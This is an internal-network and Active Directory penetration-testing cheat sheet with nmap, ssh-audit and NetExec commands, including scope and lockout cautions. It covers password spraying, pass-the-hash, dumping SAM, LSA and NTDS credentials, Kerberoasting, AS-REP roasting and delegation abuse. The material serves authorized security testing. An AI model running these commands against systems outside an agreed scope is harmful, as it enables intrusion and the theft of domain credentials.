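# Internal-network / Active Directory engagement cheat sheet.
# Placeholders: FILE.ovpn, IP, IP/MASK, DOMAIN, USER, PASS, HASH, HOST$.
# Every command below touches live targets: run them only against hosts that
# are inside the agreed scope, and expect the noisy ones (spraying, dumping,
# delegation) to show up in the target's logs.

# --- VPN access ---
# creds.txt is plaintext (line 1 = username, line 2 = password): keep it
# owner-only (chmod 600) and out of any shared or synced directory.
openvpn FILE.ovpn --auth-user-pass creds.txt

# --- Port / service discovery over the VPN ---
# -sS needs root. -Pn/-n skip host discovery and DNS, -g 53 uses source port 53
# (slips past sloppy filters), --open prints only open ports, -p- is all 65535
# ports, -e tun0 pins the scan to the VPN interface, -iL reads targets from a
# file. A full-range -sV scan over a VPN is slow: save the output (-oA) so you
# never have to repeat it.
nmap -sSV -Pn -n -g 53 --open -p- -e tun0 -iL ips.txt

# --- LDAP check ---
# ldap-rootdse reads the RootDSE without credentials (naming contexts, DC name):
# a quick way to confirm that a host is a domain controller.
nmap -sSV -Pn -p 389 --script ldap-rootdse IP

# --- SSH configuration audit ---
# Keep only the target, the software banner and the CVE lines. Overwrite
# rather than append: a re-run that appends leaves duplicate/stale entries,
# which the pairing step below cannot tell apart from new hosts.
ssh-audit -T hosts.txt | grep -E "\(gen\) target|\(gen\) software|\(cve\)" > ssh.txt

# One "target - software" line per host, sorted by software. This pairs each
# target line with the software line that follows it, so it assumes ssh-audit
# emitted exactly one of each per host; a host with no banner shifts the
# pairing by one line — sanity-check the output before trusting it.
grep -E "target|software" ssh.txt | cut -d ' ' -f3,4 | paste -d " " - - | sort -k3,3 | sed 's/ / - /'

# Unique CVE identifiers seen across all audited hosts.
grep cve ssh.txt | cut -d ' ' -f2 | sort -u

# --- NetExec (nxc) ---
# Protocols: smb, ssh, ldap, rdp, wmi, ftp, nfs, vnc, winrm, mssql
# NOTE: a password given with -p "PASS" ends up in shell history and is
# visible to every user through `ps` on a shared jump host. Prefix the command
# with a space (HISTCONTROL=ignorespace) and clear history when done.

# SMB: authentication forms
nxc smb IP/MASK                                      # unauthenticated: OS, domain, signing, SMBv1
nxc smb IP/MASK -u "DOMAIN/USER" -p "PASS"           # domain user
nxc smb IP/MASK -d "DOMAIN" -u "USER" -p "PASS"      # domain user (explicit -d)
nxc smb IP/MASK -u "USER" -p "PASS" --local-auth     # local (SAM) user
nxc smb IP/MASK -u '' -p ''                          # null session
nxc smb IP/MASK -u 'a' -p ''                         # guest: bogus user + empty password (only if the Guest account is enabled)

# Pass-the-hash: replace -p with -H
#   -u "USER" -H "LM:NT"     full NTLM hash
#   -u "USER" -H "NT"        NT hash only

# Enumeration flags (append to one of the authenticated forms above)
#   --shares                             shares and the current user's access
#   --shares --filter-shares READ WRITE  only shares you can read/write
#   --interfaces
#   --disks
#   --loggedon-users
#   --pass-pol                           lockout threshold/window: read this BEFORE any spraying
#   --users
#   --groups
#   --local-group
#   --sessions
#   --rid-brute                          enumerate accounts by cycling RIDs (often works over a null/guest session)
#   -M enum_av                           which AV/EDR is installed

# Credential dumping: requires local admin on the target, writes to the host
# and is a high-visibility action. Confirm it is in scope before running.
#   --sam      local account hashes
#   --lsa      LSA secrets / cached domain credentials
#   --ntds     the AD database (domain controllers only) — every domain hash

# Relay: list hosts where SMB signing is not required (signing:False)
#   --gen-relay-list relay.txt

# Spraying / brute force: read --pass-pol first and stay under the lockout
# threshold per observation window — brute-forcing a single user (second form)
# is the one most likely to lock an account. Every failed attempt is logged on
# the target. --continue-on-success keeps going after a valid hit.
#   -u users.txt -p "PASS" -d "DOMAIN" --continue-on-success          one password against every user (spray)
#   -u "USER" -p pass.txt --continue-on-success                       many passwords against one user (lockout risk)
#   -u users.txt -p pass.txt --continue-on-success                    every user x every password
#   -u users.txt -p users.txt --no-bruteforce --continue-on-success   username == password
#   -u users.txt -p pass.txt --no-bruteforce --continue-on-success    pairwise: user1:pass1, user2:pass2, ...

# Delegation abuse. The RBCD form writes msDS-AllowedToActOnBehalfOfOtherIdentity
# on the target computer object — this modifies AD, so record the original
# value and restore it when finished.
#   -u "USER" -p "PASS" --delegate Administrator           RBCD: impersonate the local Administrator on the target
#   -u 'HOST$' -H "HASH" --delegate Administrator --self    S4U2Self using the computer account's own hash

# Quick wins from the unauthenticated scan
nxc smb IP/MASK | grep "signing:False"   # SMB signing not required: relay candidates
nxc smb IP/MASK | grep "SMBv1:True"      # SMBv1 still enabled

# LDAP (prefix: nxc ldap IP -u "USER" -p "PASS")
#   --dc-list
#   --users
#   --password-not-required      accounts flagged "password not required"
#   --pass-pol
#   --asreproast hashes.txt      AS-REP roastable users -> hashes.txt, crack offline
#   --kerberoasting hashes.txt   SPN accounts -> TGS hashes, crack offline (each TGS request is logged)
#                                use different output files for the two so the hash types stay separate
#   --bloodhound -c COLLECTION   COLLECTION: Group, LocalAdmin, Session, Trusts, Default, DCOnly, DCOM,
#                                RDP, PSRemote, LoggedOn, Container, ObjectProps, ACL, All

# --- Interactive share access ---
# Unquoted, each \\ collapses to a single backslash, so smbclient receives
# \\IP\SHARE (with single quotes write '\\IP\SHARE'). --password on the
# command line is visible in ps/history: drop it and answer the prompt instead.
smbclient \\\\IP\\SHARE -U 'DOMAIN\USER' --password='PASS'

# --- Windows-side toolbox (for a foothold / jump box) ---
#   Advanced IP Scanner, PingCastle, PuTTY, WinSCP, NP++, DBeaver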